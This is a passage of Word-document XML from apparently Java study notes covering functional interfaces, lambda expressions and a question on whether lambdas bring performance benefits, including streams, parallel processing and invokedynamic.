    </w:p>
    <w:p w14:paraId="5D056C4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41886B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ayGoodbye() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF4CB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bye!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693205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5E6BC" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4641A2E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5F131AE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greetMorning() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC2F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 morning!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C3303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E10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A29D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500437FB"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face Greeting has one abstract method sayHello().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE48355"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has a default method sayGoodbye() and a static method greetMorning().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F23F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24044">
          <v:rect id="_x0000_i1763" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F640E55"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Functional Interface with Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8684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you can implement this Greeting interface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1F9825D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04BF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9E6E8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implement sayHello method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C026B2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ame) -&gt; System.out.println("Hello, " + name + "!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4E57F" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7975136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lambda-based method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7711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Hello("Siddhant");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EF8082" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C21CBB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57906F0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Goodbye();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFFAFE3" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0B8397"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3EF7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Morning();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C6067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F1D39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4F776A"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67A4E76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Siddhant!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4D9E8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bye!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C85C0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morning!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FDD27"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953DBC4"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name) -&gt; System.out.println("Hello, " + name + "!") provides the implementation of the abstract method sayHello().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122A353"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from the functional interface without needing to implement them in the lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E09F0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83ACE">
          <v:rect id="_x0000_i1764" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C420E1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a basic example. In real-world applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java's built-in functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Function, Consumer, Predicate, and Supplier are frequently used. Let me know if you want more details on those!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C542754" w14:textId="1ED92622"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65" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3C0FD" w14:textId="77777777" w:rsidR="00500D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00500D6E" w:rsidP="00500D6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F07B82" w14:textId="77777777" w:rsidR="00500D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00500D6E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="_Toc197867470"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose you are using lambda expressions and other than lambda expressions then are we getting any performance benefits?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
    </w:p>
    <w:p w14:paraId="09C0934A" w14:textId="396CA124" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE"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erformance Benefits of Lambda Expressions in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF24D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lambda expressions are a core feature of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that allows for more concise and readable code, they do </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not inherently offer significant performance improvements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over traditional approaches (such as using anonymous </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">classes or concrete classes). However, there are certain indirect performance benefits, depending on how and where you use lambda expressions. Let's explore both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dire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direct</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aspects of performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A955DB0"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duced Boilerplate Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F38265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aditional Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3824C0B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lambda expressions, using anonymous inner classes (especially for interfaces with a single method) leads to more verbose code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7500DFE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3D9B659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new OnClickListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94E0E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3855E6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nClick(View view) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8376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246F7B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E9FE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DF4C2B"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Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79D27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 lambda expression simplifies the code by reducing the boilerplate and focusing on functionality directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C8F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1A73954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view -&gt; System.out.println("Button clicked"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32F7D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15C047F"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class size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambda expressions eliminate the need for generating additional classes (e.g., anonymous classes) during compilation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022557DA"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 Smaller compiled bytecode means more efficient memory utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA8064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is doesn't directly improve runtime performance, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduces the overhead in terms of memor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creases code maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204F76E"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19E252">
          <v:rect id="_x0000_i1766" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="739525A1"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ternal Optimizations by JVM (Lazy Evaluation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1763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ome scenarios,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benefit from JVM optimizations, such as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layed instantiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0146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0CCFF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don't hold unnecessary state) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>effectively implemented as function objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means they can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optimized at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and the JVM can reuse the lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619361C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consider </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stream operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using lambdas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B768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E9EBAF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1A783A5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116267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07333CA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53AA3E23"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51EA765"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Operations like filter and map in streams can take advantage of lazy evaluation, meaning elements are processed only when required, rather than immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408AFFF"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When using parallel streams (involving lambda expressions), the JVM may optimize by splitting tasks across multiple cores, which can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>improve performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when used with large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C54AF7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C4173">
          <v:rect id="_x0000_i1767" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC3C4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arallel Processing with Streams (Indirect Performance Improvement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5702282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use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions with stream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approach allows for parallel execution of operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CBDD8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0FFD563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parallelStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E11FE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B90881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02C1277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71466B6"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The stream can process elements in parallel on multiple threads, taking advantage of multi-core processors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B52377"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CPU usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Large datasets that involve expensive computations (like map, reduce, etc.) can be distributed efficiently across multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E8AC8"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level optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The JVM is capable of optimizing parallel operations through task scheduling and thread management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF12E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No Performance Overhead in Most Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745894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erms of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>execution spee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do not introduce significant overhead compared to traditional anonymous classes. They are implemented using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a feature that allows for dynamic method invocation and is optimized by the JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B13733"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rst time a lambda expression is invoked, the JVM generates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for it, which is similar in performance to a method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F8368"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equent invocations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are typically faster because the lambda is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cached</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70810B7D"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37B490">
          <v:rect id="_x0000_i1768" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A2AB08"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JVM Optimization (Invokedynamic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788805A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re implemented using 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which allows the JVM to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optimize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> function invocations at runtime. This provides flexibility and potentially better performance for specific use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154ED1C2" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Method Lookup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The JVM dynamically resolves the method reference for a lambda, enabling better performance through optimization techniques like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method inli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all site caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD1C88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Consideration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A06E71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improves </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic method resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can enhance performance over static method calls (in specific cases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB52F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6E5B6">
          <v:rect id="_x0000_i1769" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A94C4"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When Lambda Might Have Performance Drawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F9DE2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might have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>marginally slower performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to traditional anonymous classes in specific edge cases, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD15F3"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ful lambdas</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a lambda captures a large amount of state (e.g., a reference to a large object), it can introduce additional overhead due to object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CFEE8F"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lining costs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: While lambdas can be inlined, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-time execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a lambda might incur some overhead due to method handle resolution and class loading, although this is typically optimized by the JVM after the first call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFB14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773216">
          <v:rect id="_x0000_i1770" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7740B5A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230"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="48D3C7BB" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08859EBD"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276ED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act on Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="4283F58E" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FA22F6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Boilerplate</w:t>
            </w:r>
          </w:p>
